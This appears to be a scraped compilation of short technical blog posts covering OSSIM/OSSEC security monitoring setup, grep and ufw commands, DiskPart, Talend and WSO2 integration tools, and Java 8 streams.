It provides the SSH authentication to the host you want to access. For Cisco devices (PIX, routers, etc), you need to provide an additional parameter for the enable password. The same thing applies if you want to add support for “su”, it must be the additional parameter.
1. Log into AlienVault USM. 2. Navigate to environment -> detection -> hids -> agentless 3. Click on 'New' and add new HIDS in agentless
Access log moves to sensor / data source then I mapping to event id with considering the rules in ossim.
Data sources can be found in “ossim ->configuration –> threat_intelligence –> data_source” and search for source as below. Pick “AlienVault HIDS-accesslog” and it reads the access log.
Pass the -n option to precede each line of output with the number of the line in the text file $ grep -n 'root' /etc/passwd
Ignore word case $ grep -i 'word' /path/to/file
Use grep recursively under each directory
$ grep -r 'word' /path/to/file
Use grep to search 2 different words
$ egrep -w 'word1|word2' /path/to/file
Grep invert match
$ grep -v 'word' /path/to/file
you can force grep to display output in colors, enter: $ grep --color 'word' /path/to/file
You can limiting the results count $ grep -m 10 'word' /path/to/file
You can match regular expression in files (Syntax: grep "REGEX" filename) $ grep 'word1.*word2' /path/to/file
? The preceding item is optional and matched at most once. * The preceding item will be matched zero or more times. + The preceding item will be matched one or more times. {n} The preceding item is matched exactly n times. {n,} The preceding item is matched n or more times. {,m} The preceding item is matched at most m times. {n,m} The preceding item is matched at least n times, but not more than m times.
Display N lines around match
Grep can display N lines after match (Syntax: grep -A <N> "string" filename) $ grep -A 2 'word' /path/to/file
The following example prints the matched line, along with the two lines after it. $ grep -A 2 -i 'word' /path/to/file
-C is the option which prints the specified N lines before the match. $ grep -C 2 'word' /path/to/file
The Linux kernel in Ubuntu provides a packet filtering system called netfilter, and the traditional interface for manipulating netfilter are the iptables suite of commands. The Uncomplicated Firewall (ufw) is a frontend for iptables and is particularly well-suited for host-based firewalls.
Allowing port from any $ sudo ufw allow 122/tcp
Listing the app and app infor $ sudo ufw app list $ ufw app info Squid
UFW status $sudo ufw status verbose
Aollowing the port in the IP $ sudo ufw allow from 192.168.3.231 to any port 443
Unfortunately Windows does not support Fdisk anymore. But there is another good command line tool to solve this problem. DiskPart in windows is useful format unallocated spaces in USB pen.
1. Enter ‘diskpart’ in cmd
Then disk part will start
2. List down storage in PC by
list disk
3. Select the disk to fix by (my case it is disk 1)
A brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Install pre requests apt-get install python-ipy python-nmap python-paramiko
In OSSEC, the rules are classified in multiple levels from the lowest (00) to the maximum level 16. But some levels are not used right now and below explain level details. 00 - Ignored 01 – None 05 – Error is generated by user 06 - Low relevance attack 08 - First time seen 12 - High important event 15 - Severe attack ( There is no chances of false positives)
Rules group are used specify groups for specific rules. It’s used for active response reasons and for correlation.
Checking Rules
You can find the OSSEC rule list ‘var/ossec/rules’. All this xml files in this directory contains the rules.
In rule xml file we have name group (‘group name’) at parent level of the xml <group name="web,accesslog,">. In there you can define the rules as below
‘is_simple_http_request’ [1] is function which already inbuilt in OSSEC, if you building ossec from source you can customizing the this functions or added new function that will improve your rules.
Testing the Rules
Initial Test Case
To test above rules you can add custom log record as below
In here we need to get current time by the terminal with below format. 23/Aug/2016:10:09:28 +0530
In here I am using well known decoder in OSSEC if you need new OSSEC decoder you can write new decoder also [1]. Add new file to rules directory in OSSEC.
Creating new OSSEC rule set
$ vi var/ossec/rules/custom_access_rules.xml
In here I am interest to monitor web user behavior model. So I only need 200 http status code and I mark that rule with level 05 as it is important to this use case.Mark sure that rule id is unique. I am using ‘accesslog’ decoder as I am reading web access log in here. Here is content of my new ossec rule xml files.
We need to have extra user data field on our security event. We need to know
event occurred time
Host Server IP
Editing particular event on ‘/etc/ossim/agent/plugins/ossec-single-line.cfg’. We can achieve it. We are interest on Web group and ID 0030. We added below line as our need.
Triggering action over the event occurrence in OSSIM is going to explain in this article. There is agent in the system with IP, 192.168.80.22. Email is to be send to server admins whenever this agent disconnect and reconnect to SEIM server. Below is the sample event
Here is event ID and data source ID that are interested when agent start to communicate with SEIM server.
If you’re familiar with SEIM tools or OSSEC, then you know syscheck. Syscheck is the integrity checking daemon within OSSEC. It’s purpose is simple, identify and report on changes within the system files. Once the baseline is set, syscheck is able to perform change detection by comparing all the checksums on each scan. If it’s not a 1 for 1 match, it reports it as a change. If new files are added, it identifies it as new, and reports it. Syscheck options are available in the server, local and agent installation.
In /var/ossec/etc/ossec.conf we can find the Syscheck config. The frequency option is in seconds and is defaulted to 22 hours (or 79,200 seconds). You have added below for new file adding.
<alert_new_files>yes</alert_new_files>
Syscheck in OSSEC is also leveraged the inotify system calls as its detection engine.
You can ignore files in directory using below rules, with rules level 0 or using 'ignore' tag
<rule id="100000" level="0">
or
<ignore>foo/test/</ignore>
Option attributes
realtime
check_all
check_sum
frequency
scan_day
auto_ignore
refilter_cmd - This option can potentially impact performance negatively
By default when a file has changed three times, new changes will be automatically ignored. Handy but it could be improved. When I’m deploying security tools and control, my goal is to reduce the “noise” as much as possible. A side effect of file integrity monitoring is the number of false positive alerts generated.
There is few thing that make my work enjoyable with WSO2 ESB as it provides support for JavaScript Object Notation (JSON) payloads in messages. It is not very new feature and it old feature.
It supports
JSON message building
Converting a payload between XML and JSON
Accessing content on JSON payloads
Logging JSON payloads
Constructing and transforming JSON payloads
Troubleshooting, debugging, and logging
But I will explain some basic feature on this and it is worth to know. It makes your task easy all the time. It is accessing content on JSON payloads
Data integration is the combination of technical and business processes used to combine data from disparate sources into meaningful and valuable information. Today some systems may store data in a denormalized form and data integration tools able handle those. In this blog post Talend will be used to show case handling simple denormalized data set file.
For example, system stores state data with the following schema: [filed1];[[filed2.1],[filed2.2]] Schema is mapping [StateID];[[StateName],[PostCode]]. Here is the sample file ‘states.csv’.
Post is very basic one, Since Talend is all about data integration. Finding a BigDecimal [1] in such data set is very common.
BigDecimal VS Doubles
A BigDecimal is an exact way of representing numbers. A Double has a certain precision. Working with doubles of various magnitudes (say d1=1000.0 and d2=0.001) could result in the 0.001 being dropped all together when summing as the difference in magnitude is so large. With BigDecimal this would not happen.
The disadvantage of BigDecimal is that it's slower, and it's a bit more difficult to program algorithms that way (due to + - * and / not being overloaded).
If you are dealing with money, or precision is a must, use BigDecimal. Otherwise Doubles tend to be good enough.
Big Decimal Sample
First we go with Big Decimal value such as ‘1.8772265500517E19’. It means 1.8772265500517 x 1019 . We need to pass it without scientific notation. You can used ‘tJava’ comment in Talend and used simple java to achieve this.
BigDecimal bigDecimal = new BigDecimal("1.8772265500517E19"); System.out.println(bigDecimal.toPlainString());
If you think you need to specific decimal point count also. Then you can used below line
System.out.printf("%1$.2f", bigDecimal);
2 is the number of decimal places you want. You can change as you need.
There are few ways to achieve this such as 'Talend Routines' or 'tJava', etc. But here we used tJava component. Add below lines to the ‘Basic setting panel tab’
Enterprise Data Integration is a broad term used in the integration landscape to connect multiple Enterprise applications and hardware systems within an organization. All these enterprise data integration lead to achieve to remove the complexity by simplifying data management as a whole.
Unified Data Management Architecture
Unified Data Management Architecture offers reliability and performance of a data warehouse, real-time and low-latency characteristics of a streaming system, and scale and cost-efficiency of a data lake. More importantly, UDM utilizes a single storage backend with benefits of multiple storage systems which avoids moving data across systems hence data duplication, and data consistency issues. Overall, less complexity to deal with.
Common In-Memory Data Interfaces It is a new data integration pattern. It depends on a shared high-performance distributed storage or a common data format sitting between compute and storage. Alluxio and Apache Arrow are sample for respectively. Apache Arrow has support for 13 major big data frameworks including Calcite, Cassandra, Drill, Hadoop, HBase, Ibis, Impala, Kudu, Pandas, Parquet, Phoenix, Spark, and Storm.
Image may be NSFW. Clik here to view.
Machine Learning with Data Integration Machine learning and artificial intelligence (AI) tools are based smart data integration assistants. These assistants can recommend next-best-action or suggest datasets, transforms, and rules to a data engineer working on a data integration project.
Event-Driven Data Flow Architecture More and more organizations are jumping to the event-driven architecture with the view that it can provide real-time and fast the existing systems. To achieve this, organizations are utilizing distributed messaging system such as Apache Kafka, Message brokers. On top, they are implementing concepts such events, topics, event producers, and event consumers. A key aspect of event-driven data flow architecture is support for microservices architecture, and, more specifically, database per service patterns.
The Lifecycle Management(LCM) plays a major role in SOA Governance. WSO2 Governance Registry Lifecycle Management supports access control at multiple levels in lifecycle state. 1. Permissions 1.1 Check items with permissions configuration <permissions> <permission roles=""/> </permissions> 1.2 State Transitions by transitionPermission configuration <data name="transitionPermission"> <permission forEvent="" roles=""/> </data> 2. Validations 2.1 Check items by he validations configuration <validations> <validation forEvent="" class=""> <parameter name="" value=""/> </validation> </validations> 2.2 State Transitions by transitionValidations <data name="transitionValidation"> <validation forEvent="" class=""> <parameter name="" value=""/> </validation> </data> 3. Resource Permissions at each environment <permission roles=""/> 4. State transition approvals with voting procedure <data name="transitionApproval"> <approval forEvent="Promote" roles="" votes="2"/> </data>
Use case Just think how book is produce from writing to market. Book will have it’s own Book Life Cycle [2] and it main contain Acquisitions, Editorial, Production and Marketing
In Acquisitions state it will have some element or items such as Proposal, Submit manuscript, Peer Review, Approved by editorial board and Launched in to editorial department
Editorial state will contains Copyediting, Author review, typesetting and design, Page proofs ready, Proofreading and Final Author review
Book is printing and Shipped are event can be found in Production
Marketing state consist with Moving book in to warehouse, picking publication date, book announced, moving the book to the book stores and promotion continues
Image may be NSFW. Clik here to view. It is not only the life cycle, Book contains it’s own attribute (schema) [1]. You can define new asset type to WSO2 GREG. Asset can have custom lifecycle. Let added Book asset type to WSO2 GREG with RXT.
In this post give some basic on JAVA Stream API which is added in Java 8. It works very well in conjunction with lambda expressions. Pipeline of stream operations can manipulate data by performing operations like search, filter, count, sort, etc. A stream pipeline consists of a source such as an array, a collection, a generator function, an I/O channel. It may have zero or more intermediate operations for transform a stream.
Stream operations are divided into intermediate and terminal operations.
Intermediate operations return a new stream. They are always lazy; executing an intermediate operation does not actually perform any filtering, but instead creates a new stream that, when traversed, contains the elements of the initial stream that match the given predicate. Intermediate operations do not get executed until a terminal operation is invoked as there is a possibility they could be processed together when a terminal operation is executed. eg: map, filter, flatmap, limit, sorted, distinct, peek
Terminal operations produces a non-stream, result such as primitive value, a collection or no value at all. Terminal operations are typically preceded by intermediate operations which return another Stream which allows operations to be connected in a form of a query. eg: findAny, allMatch, count, max, min, etc.
Sample in can be found in here
Intermediate operations are further divided into stateless and stateful operations.
Stateless operations, such as filter and map, retain no state from previously seen element when processing a new element, each element can be processed independently of operations on other elements.
Stateful operations, such as distinct and sorted, may incorporate state from previously seen elements when processing new elements. Stateful operations may need to process the entire input before producing a result. For example, one cannot produce any results from sorting a stream until one has seen all elements of the stream.
Sample in can be found in here. You have be care full on this if you use in wrong order it may lead memory issue. As example if we sort() stream first then it will load all in to memory as shown in sample. (test_sorted_notShortCircuiting)
You can see all the elements are loaded in ‘test_sorted_notShortCircuiting’ though it have limit of 2.
Streams in serial or in parallel
You can execute streams in serial or in parallel. When a stream executes in parallel, the Java runtime partitions the stream into multiple sub-streams.
As example - Collection has methods Collection.stream() and Collection.parallelStream(), which produce sequential and parallel streams respectively.
When you do that, the stream is split into multiple chunks, with each chunk processed independently and with the result summarized at the end. In sample implementation of get sum of the longs method you can take advantage of parallelization and utilize all available CPU cores.
Optional
In the sample you will find new class Optional which was introduce with Java 8. It is used to represent a value is present or absent. The main advantage of this new construct is that No more too many null checks and NullPointerException. It avoids any runtime NullPointerExceptions and supports us in developing clean and neat Java APIs or Applications.
When a value is present, the Optional class just wraps it. Conversely, the absence of a value is modeled with an “empty” optional returned by the method Optional.empty. It’s a static factory method that returns a special singleton instance of the Optional class. Dereference a null will invariably cause a NullPointer-Exception, whereas Optional.empty() is a valid, workable object.